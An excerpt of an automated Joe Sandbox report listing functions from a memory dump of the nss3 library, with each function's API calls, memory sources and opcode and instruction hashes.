PR_Free.NSS3(?), ref: 6D4F0A87

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 49ff0a4407746476ef404dac7a473e04e2f324099aa679b80705d40289710dea
Instruction ID: b7f80e2185f06c44c04493208317f12cfc7b04f5a302a17eac07db9be53b11d9
Opcode Fuzzy Hash: 49ff0a4407746476ef404dac7a473e04e2f324099aa679b80705d40289710dea
Instruction Fuzzy Hash: BA1102B2C04A42CBE7118F26C981B2373A8BBD1304F505928D95682A20EB31FC52CB91

Function 6D518FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6D520710), ref: 6D518FF1
PR_CallOnce.NSS3(6D662158,6D519150,00000000,?,?,?,6D519138,?,6D520710), ref: 6D519029
calloc.MOZGLUE(00000001,00000000,?,?,6D520710), ref: 6D51904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6D520710), ref: 6D519066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6D520710), ref: 6D519078

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 469be949c1b65526c3aa30513b9e724e5d005191ea6fdcd741c45a1a349567de
Instruction ID: f677e86c09862f2a0069114ddd3afa0b4bcf345cff7547cb1d3fb17bee054a40
Opcode Fuzzy Hash: 469be949c1b65526c3aa30513b9e724e5d005191ea6fdcd741c45a1a349567de
Instruction Fuzzy Hash: E711487560815357F72456AEAC04A7632ACEB827AAF010834FE68C2A41F311CD41CBA2

Function 6D52CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6D541E10: TlsGetValue.KERNEL32 ref: 6D541E36
Part of subcall function 6D541E10: EnterCriticalSection.KERNEL32(?,?,?,6D51B1EE,2404110F,?,?), ref: 6D541E4B
Part of subcall function 6D541E10: PR_Unlock.NSS3 ref: 6D541E76

free.MOZGLUE(?,6D52D079,00000000,00000001), ref: 6D52CDA5
PK11_FreeSymKey.NSS3(?,6D52D079,00000000,00000001), ref: 6D52CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6D52D079,00000000,00000001), ref: 6D52CDCF
DeleteCriticalSection.KERNEL32(?,6D52D079,00000000,00000001), ref: 6D52CDE2
free.MOZGLUE(?), ref: 6D52CDE9

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 50fe685de96da9332770bc49358f8674cd845ca97837e01e0b0480fedb9ceabf
Instruction ID: 47043d76981065498d957a9a3d5113ffc5155a03ececb7da9e1eecba5b90f77c
Opcode Fuzzy Hash: 50fe685de96da9332770bc49358f8674cd845ca97837e01e0b0480fedb9ceabf
Instruction Fuzzy Hash: BA1170B2A00146ABEB048F66EC44E66BB6CBF442657054521EA0997D42E732E874C7E1

Function 6D592D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6D595B40: PR_GetIdentitiesLayer.NSS3 ref: 6D595B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D592D9C

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_EnterMonitor.NSS3(?), ref: 6D592DB2
PR_EnterMonitor.NSS3(?), ref: 6D592DCF
PR_ExitMonitor.NSS3(?), ref: 6D592DF2
PR_ExitMonitor.NSS3(?), ref: 6D592E0B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: faa202cac65e1fb6518cd50bf6cd18531fc3426b38c5a84a2d782828ec1526f1
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: E30108F59143409FE7349E25FC40B97B3A5EF81319F410838E9498AA11E732F8218693

Function 6D592CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6D595B40: PR_GetIdentitiesLayer.NSS3 ref: 6D595B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D592CEC

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_EnterMonitor.NSS3(?), ref: 6D592D02
PR_EnterMonitor.NSS3(?), ref: 6D592D1F
PR_ExitMonitor.NSS3(?), ref: 6D592D42
PR_ExitMonitor.NSS3(?), ref: 6D592D5B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: ee77938bb1c06a6e05a72063ace33186abe0d0aed79333ceace1c1f525a09dcf
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 590108F59043449BE7349E25FC40B87B3A5FF81319F414829E9598A610E332F8128B93

Function 6D52AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6D513090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D52AE42), ref: 6D5130AA
Part of subcall function 6D513090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D5130C7
Part of subcall function 6D513090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6D5130E5
Part of subcall function 6D513090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D513116
Part of subcall function 6D513090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D51312B
Part of subcall function 6D513090: PK11_DestroyObject.NSS3(?,?), ref: 6D513154
Part of subcall function 6D513090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6D5099FF,?,?,?,?,?,?,?,?,?,6D502D6B,?), ref: 6D52AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6D5099FF,?,?,?,?,?,?,?,?,?,6D502D6B,?), ref: 6D52AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6D502D6B,?,?,00000000), ref: 6D52AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6D502D6B,?,?,00000000), ref: 6D52AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6D502D6B,?,?), ref: 6D52AEA3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 0481dd7ffa5dde027981831245d531380710f2afeda3e7a5f8f199b15ee8e873
Instruction ID: 32a56225f3588ffe1e2ba8057ffb63b9446ef007a55c81b43eb722253d11a544
Opcode Fuzzy Hash: 0481dd7ffa5dde027981831245d531380710f2afeda3e7a5f8f199b15ee8e873
Instruction Fuzzy Hash: 0201D667A1811057E70A926CAC81E6F31548BC766CB094832EA05C7B81F611CD0B42D3

Function 6D61BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6D617AFE,?,?,?,?,?,?,?,?,6D61798A), ref: 6D61BDC3
free.MOZGLUE(?,?,6D617AFE,?,?,?,?,?,?,?,?,6D61798A), ref: 6D61BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D617AFE,?,?,?,?,?,?,?,?,6D61798A), ref: 6D61BDE9
free.MOZGLUE(?,00000000,00000000,?,6D617AFE,?,?,?,?,?,?,?,?,6D61798A), ref: 6D61BE21
free.MOZGLUE(00000000,00000000,?,6D617AFE,?,?,?,?,?,?,?,?,6D61798A), ref: 6D61BE32

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 32d970f3a23f3a892c172d1b631d86dc85f61aa7a57a7dfe95149a21cce1e79b
Instruction ID: b89f3ae3af4eb019a7ccc87c1f6510349e68ea1b83a3165b64a5777cb643c653
Opcode Fuzzy Hash: 32d970f3a23f3a892c172d1b631d86dc85f61aa7a57a7dfe95149a21cce1e79b
Instruction Fuzzy Hash: E511E5B59082819FDF20CF6AD845B223BB5BB4F395B450029E50AC7311E732A868CB93

Function 6D610930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6D610C83), ref: 6D61094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6D610C83), ref: 6D610974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610983
_PR_MD_UNLOCK.NSS3(?,?,6D610C83), ref: 6D61099F
OutputDebugStringA.KERNEL32(?,?,6D610C83), ref: 6D6109B2

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: af1cbd7620c6ac5274b5dd9603589a437446836f2325c5c8aecb30e56db9e4ed
Instruction ID: bec1acb9767e23dbe48883a3e9cd5333f9775b888ae65005a35e44f693a4e4dc
Opcode Fuzzy Hash: af1cbd7620c6ac5274b5dd9603589a437446836f2325c5c8aecb30e56db9e4ed
Instruction Fuzzy Hash: BB012DBC585180DFDF009F2ACC55B753BB8AB56318F185619F646C3262D739A891CA12

Function 6D617C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6D617C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D617C83
malloc.MOZGLUE(00000001), ref: 6D617C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D617C9F
PR_GetCurrentThread.NSS3 ref: 6D617CAD

Part of subcall function 6D5C9BF0: TlsGetValue.KERNEL32(?,?,?,6D610A75), ref: 6D5C9C07

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 73fcced37549eac16d7314d0d7b33f90830406a64ed4672c255f8f063f21455f
Instruction ID: e180a033ac4b45c9adbb8f32111288b257f040ea36f17d999e6411003468505f
Opcode Fuzzy Hash: 73fcced37549eac16d7314d0d7b33f90830406a64ed4672c255f8f063f21455f
Instruction Fuzzy Hash: 1CF0CDB1D18206BFEB049F7ADC099577B58EF48269B01853AE80DC3711EB31E510CAAA

Function 6D61ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6D61A6D8), ref: 6D61AE0D
free.MOZGLUE(?), ref: 6D61AE14
DeleteCriticalSection.KERNEL32(6D61A6D8), ref: 6D61AE36
free.MOZGLUE(?), ref: 6D61AE3D
free.MOZGLUE(00000000,00000000,?,?,6D61A6D8), ref: 6D61AE47

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 9ae1386fe3334a676e12e788c2ded7ca834febe9aa740637c19abb17cadc0545
Instruction ID: 5fa5b0a0f950caabbbb8d05a788621dcd58cf4495eb453c7833d92c3f14a5bb8
Opcode Fuzzy Hash: 9ae1386fe3334a676e12e788c2ded7ca834febe9aa740637c19abb17cadc0545
Instruction Fuzzy Hash: 6DF09675400A02A7CB10CF69D808E577B78BF8A735B150329F52B83540D732E166DBD5

Function 6D49BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6D63AAF9,?), ref: 6D49BE37

Strings

winFileSize, xrefs: 6D49BF07
Pam, xrefs: 6D49BED4
am, xrefs: 6D49BDD7

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: am$Pam$winFileSize
API String ID: 4246442610-626737011
Opcode ID: d53ee564ab183d3ce56a61571facfef2c074c11f89540bfe4d2657063b71e498
Instruction ID: cbcba36a0c2179be1aed8d7552703d46ec3d8feb8ccd66e8c07095914ea27e1a
Opcode Fuzzy Hash: d53ee564ab183d3ce56a61571facfef2c074c11f89540bfe4d2657063b71e498
Instruction Fuzzy Hash: 46619A31A04656EFDF0ACF2AC4D0A69BBB5BF8A304B148629D9158F744D730EC52CBD2

Function 6D4A7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4A7D35

Strings

database corruption, xrefs: 6D4A7D29
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4A7D13, 6D4A7D1F, 6D4A7D47, 6D4A7D53, 6D4A7D5F
%s at line %d of [%.10s], xrefs: 6D4A7D2E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: f530a9c7782f04704663c490bbe1f56ac7b059bb3db57de6b02fbb74ef782e9f
Instruction ID: 906fe71b50c1d3e146145a3b3b4710a18a821944e7727b89148eee6affe6af0b
Opcode Fuzzy Hash: f530a9c7782f04704663c490bbe1f56ac7b059bb3db57de6b02fbb74ef782e9f
Instruction Fuzzy Hash: C731F471E0826997C720CF9DC880DBAB7E1BF58305B698196E544BB38AD671DC41CBE0

Function 6D496C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6D496D36

Strings

database corruption, xrefs: 6D496D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D496D20
%s at line %d of [%.10s], xrefs: 6D496D2F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 7bf0214fcb90302d7f392c853ebe23d9730274e9c7dcd96b35f216dd18efa4b9
Instruction ID: 898d27fc3f613a3b96d781f369d1539d13dc8b559c9aa4f329b9f9ab41178b32
Opcode Fuzzy Hash: 7bf0214fcb90302d7f392c853ebe23d9730274e9c7dcd96b35f216dd18efa4b9
Instruction Fuzzy Hash: 2C21E0306043059BC710CF1AD840F6ABBE6BF85308F25862DD8699F792E771ED458BD2

Function 6D572FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+Wm,6D5732C2,<+Wm,00000000,00000000,?), ref: 6D572FDA

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6D57300B

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6D57302A

Part of subcall function 6D560840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D5608B4

Part of subcall function 6D54C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6D54C45D
Part of subcall function 6D54C3D0: TlsGetValue.KERNEL32 ref: 6D54C494
Part of subcall function 6D54C3D0: EnterCriticalSection.KERNEL32(?), ref: 6D54C4A9
Part of subcall function 6D54C3D0: PR_Unlock.NSS3(?), ref: 6D54C4F4

Strings

<+Wm, xrefs: 6D572FD0

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+Wm
API String ID: 2538134263-1767434098
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
